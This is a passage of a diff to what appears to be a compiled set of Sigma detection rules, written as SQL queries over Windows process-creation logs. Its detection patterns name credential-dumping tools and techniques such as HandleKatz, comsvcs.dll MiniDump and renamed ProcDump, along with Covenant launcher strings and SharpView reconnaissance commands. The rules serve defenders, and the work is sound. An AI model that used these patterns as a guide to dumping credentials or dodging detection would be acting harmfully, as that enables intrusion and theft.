LIKE '%/system:none%' ESCAPE '\\' OR CommandLine LIKE '%/sam:none%' ESCAPE '\\' OR CommandLine LIKE '%/privilege:none%' ESCAPE '\\' OR CommandLine LIKE '%/object:none%' ESCAPE '\\' OR CommandLine LIKE '%/process:none%' ESCAPE '\\' OR CommandLine LIKE '%/policy:none%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_abusing_debug_privilege.yml" + "filename": "proc_creation_win_auditpol_nt_resource_kit_usage.yml" }, { - "title": "HackTool - HandleKatz LSASS Dumper Execution", - "id": "ca621ba5-54ab-4035-9942-d378e6fcde3c", + "title": "Manage Engine Java Suspicious Sub Process", + "id": "cea2b7ea-792b-405f-95a1-b903ea06458f", "status": "experimental", - "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", + "description": "Detects suspicious sub processes started by the Manage Engine ServiceDesk Plus Java web service process", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], "falsepositives": [ - "Unknown" + "Legitimate sub processes started by Manage Engine ServiceDesk Pro" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\loader.exe' ESCAPE '\\' AND CommandLine LIKE '%--pid:%' ESCAPE '\\') OR (Imphash IN ('38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650') OR Hashes IN ('IMPHASH=38D9E015591BBFD4929E0D0F47FA0055', 'IMPHASH=0E2216679CA6E1094D63322E3412D650')) OR (CommandLine LIKE '%--pid:%' ESCAPE '\\' AND CommandLine LIKE '%--outfile:%' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%.obf%' ESCAPE '\\' OR CommandLine LIKE '%dump%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\ManageEngine\\\\ServiceDesk\\\\%' ESCAPE '\\' AND 
ParentProcessName LIKE '%\\\\java.exe%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_handlekatz.yml" + "filename": "proc_creation_win_susp_manageengine_pattern.yml" }, { - "title": "Privilege Escalation via Named Pipe Impersonation", - "id": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", + "title": "Suspicious Usage Of ShellExec_RunDLL", + "id": "d87bd452-6da1-456e-8155-7dc988157b7d", "status": "experimental", - "description": "Detects a remote file copy attempt to a hidden network share. 
This may indicate lateral movement or data staging activity.", - "author": "Tim Rauch", + "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021" + "attack.defense_evasion" ], "falsepositives": [ - "Other programs that cause these patterns (please report)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE')) AND (CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%odbcconf%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%iex%' ESCAPE '\\' OR CommandLine LIKE '%comspec%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_priv_escalation_via_named_pipe.yml" + "filename": "proc_creation_win_rundll32_susp_shellexec_execution.yml" }, { - "title": "Potential Arbitrary Command Execution Using Msdt.EXE", - "id": "258fc8ce-8352-443a-9120-8a11e4857fa5", - "status": "experimental", - "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Renamed 
ProcDump Execution", + "id": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", + "status": "test", + "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Procdump illegaly bundled with legitimate software", + "Administrators who rename binaries (should be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '%IT\\_BrowseForFile=%' ESCAPE '\\' OR (CommandLine LIKE '% PCWDiagnostic%' ESCAPE '\\' AND (CommandLine LIKE '% /af %' ESCAPE '\\' OR CommandLine LIKE '% -af %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'procdump' OR ((CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND (CommandLine LIKE '% -accepteula %' ESCAPE '\\' OR CommandLine LIKE '% /accepteula %' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_msdt_arbitrary_command_execution.yml" + "filename": "proc_creation_win_renamed_sysinternals_procdump.yml" }, { - "title": "HackTool - Covenant PowerShell Launcher", - "id": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", - "status": "test", - "description": "Detects suspicious command lines used in Covenant luanchers", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "title": "HackTool - SharpView Execution", + "id": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", + "status": "experimental", + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of 
remote systems", + "author": "frack113", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1059.001", - "attack.t1564.003" + "attack.discovery", + "attack.t1049", + "attack.t1069.002", + "attack.t1482", + "attack.t1135", + "attack.t1033" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%-Sta%' ESCAPE '\\' AND CommandLine LIKE '%-Nop%' ESCAPE '\\' AND CommandLine LIKE '%-Window%' ESCAPE '\\' AND CommandLine LIKE '%Hidden%' ESCAPE '\\' AND (CommandLine LIKE '%-Command%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\')) OR (CommandLine LIKE '%sv o (New-Object IO.MemorySteam);sv d %' ESCAPE '\\' OR CommandLine LIKE '%mshta file.hta%' ESCAPE '\\' OR CommandLine LIKE '%GruntHTTP%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand cwB2ACAAbwAgA%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'SharpView.exe' OR NewProcessName LIKE '%\\\\SharpView.exe' ESCAPE '\\' OR (CommandLine LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Convert-ADName%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-SID%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR CommandLine LIKE '%Convert-SidToName%' ESCAPE '\\' OR CommandLine LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainProcess%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainShare%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignUser%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-Interesting%' ESCAPE '\\' OR CommandLine 
LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR CommandLine LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-DFSshare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainController%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainForeign%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGUIDMap%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSID%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestGlobalCatalog%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-GptTmpl%' ESCAPE '\\' OR CommandLine LIKE '%Get-GroupsXML%' ESCAPE '\\' OR CommandLine LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetForest%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGroupMember%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR CommandLine LIKE 
'%Get-NetLoggedon%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetProcess%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetUser%' ESCAPE '\\' OR CommandLine LIKE '%Get-PathAcl%' ESCAPE '\\' OR CommandLine LIKE '%Get-PrincipalContext%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegCachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegLastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegProxy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharefinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR CommandLine LIKE '%Remove-DomainObjectAcl%' ESCAPE '\\' OR CommandLine LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Request-SPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Set-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Test-AdminAccess%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_covenant.yml" + "filename": "proc_creation_win_hktl_sharpview.yml" }, { - "title": "System File Execution Location Anomaly", - "id": "e4a6b256-3e47-40fc-89d2-7a477edd6915", - "status": "experimental", - "description": "Detects a Windows program executable started from a suspicious folder", - "author": "Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, 
Nasreddine Bencherchali", + "title": "Process Dumping Via Comsvcs.DLL", + "id": "646ea171-dded-4578-8a4d-65e9822892e3", + "status": "test", + "description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)", + "author": "Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.credential_access", + "attack.t1036", + "attack.t1003.001", + "car.2013-05-009" ], "falsepositives": [ - "Exotic software" + "Unlikely, because no one should dump the process memory in that way" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\audiodg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dashost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\atbroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certreq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\defrag.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhst3g.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\logonui.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dwm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntoskrnl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dfrgui.exe' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program 
Files\\\\WindowsApps\\\\MicrosoftCorporationII.WindowsSubsystemForLinux%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND (CommandLine LIKE '%comsvcs%' ESCAPE '\\' AND CommandLine LIKE '%full%' ESCAPE '\\' AND (CommandLine LIKE '%24 %' ESCAPE '\\' OR CommandLine LIKE '%#24%' ESCAPE '\\' OR CommandLine LIKE '%#+24%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\'))) OR CommandLine LIKE '%#-4294967272%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_system_exe_anomaly.yml" + "filename": "proc_creation_win_rundll32_process_dump_via_comsvcs.yml" }, { - "title": "Suspicious Dump64.exe Execution", - "id": "129966c9-de17-4334-a123-8b58172e664d", - "status": "test", - "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", - "author": "Austin Songer @austinsonger, Florian Roth", + "title": "Suspicious Whoami.EXE Execution", + "id": "c30fb093-1109-4dc8-88a8-b30d11c95a5d", + "status": "experimental", + "description": "Detects the execution of \"whoami.exe\" with the \"/all\" flag or with redirection options to export the results to a file for later use.", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Dump64.exe in other folders than the excluded one" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\dump64.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Installer\\\\Feedback\\\\dump64.exe%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\dump64.exe' ESCAPE '\\' AND 
(CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% -all%' ESCAPE '\\' OR CommandLine LIKE '% /all%' ESCAPE '\\' OR CommandLine LIKE '% /FO CSV%' ESCAPE '\\' OR CommandLine LIKE '% -FO CSV%' ESCAPE '\\')) OR (CommandLine LIKE '%whoami%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_dump64.yml" + "filename": "proc_creation_win_whoami_susp_flags.yml" }, { - "title": "RDP Connection Allowed Via Netsh.EXE", - "id": "01aeb693-138d-49d2-9403-c4f52d7d3d62", + "title": "Copy from Admin Share", + "id": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", "status": "test", - "description": "Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware", - "author": "Sander Wiebing", + "description": "Detects a suspicious copy command to or from an Admin share or remote", + "author": "Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1562.004" + "attack.lateral_movement", + "attack.collection", + "attack.exfiltration", + "attack.t1039", + "attack.t1048", + "attack.t1021.002" ], "falsepositives": [ - "Legitimate administration activity" + "Administrative scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%tcp %' ESCAPE '\\' AND CommandLine LIKE '%3389%' ESCAPE '\\') AND (CommandLine LIKE '%portopening%' ESCAPE '\\' OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND 
CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%allow%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\') OR CommandLine LIKE '%\\\\Sysvol\\\\%' ESCAPE '\\') AND ((((NewProcessName LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE')) OR ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%copy%' ESCAPE '\\')) OR (((NewProcessName LIKE '%\\\\powershell.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe%' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_netsh_fw_allow_rdp.yml" + "filename": "proc_creation_win_susp_copy_lateral_movement.yml" }, { - "title": "APT29 2018 Phishing Campaign CommandLine Indicators", - "id": "7453575c-a747-40b9-839b-125a0aae324b", + "title": "Suspicious Double Extension File Execution", + "id": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", "status": "stable", - "description": "Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant", - "author": "Florian Roth (Nextron Systems), @41thexplorer", + "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", + "author": "Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - 
"attack.t1218.011" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%-noni -ep bypass $%' ESCAPE '\\' OR (CommandLine LIKE '%cyzfc.dat,%' ESCAPE '\\' AND CommandLine LIKE '%PointFunctionCall%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%.doc.exe' ESCAPE '\\' OR NewProcessName LIKE '%.docx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.xls.exe' ESCAPE '\\' OR NewProcessName LIKE '%.xlsx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.ppt.exe' ESCAPE '\\' OR NewProcessName LIKE '%.pptx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.rtf.exe' ESCAPE '\\' OR NewProcessName LIKE '%.pdf.exe' ESCAPE '\\' OR NewProcessName LIKE '%.txt.exe' ESCAPE '\\' OR NewProcessName LIKE '% .exe' ESCAPE '\\' OR NewProcessName LIKE '%\\_\\_\\_\\_\\_\\_.exe' ESCAPE '\\' OR NewProcessName LIKE '%.doc.js' ESCAPE '\\' OR NewProcessName LIKE '%.docx.js' ESCAPE '\\' OR NewProcessName LIKE '%.xls.js' ESCAPE '\\' OR NewProcessName LIKE '%.xlsx.js' ESCAPE '\\' OR NewProcessName LIKE '%.ppt.js' ESCAPE '\\' OR NewProcessName LIKE '%.pptx.js' ESCAPE '\\' OR NewProcessName LIKE '%.rtf.js' ESCAPE '\\' OR NewProcessName LIKE '%.pdf.js' ESCAPE '\\' OR NewProcessName LIKE '%.txt.js' ESCAPE '\\') AND (CommandLine LIKE '%.doc.exe%' ESCAPE '\\' OR CommandLine LIKE '%.docx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xls.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.txt.exe%' ESCAPE '\\' OR CommandLine LIKE '% .exe%' ESCAPE '\\' OR CommandLine LIKE '%\\_\\_\\_\\_\\_\\_.exe%' ESCAPE '\\' OR CommandLine LIKE '%.doc.js%' ESCAPE '\\' OR CommandLine LIKE '%.docx.js%' 
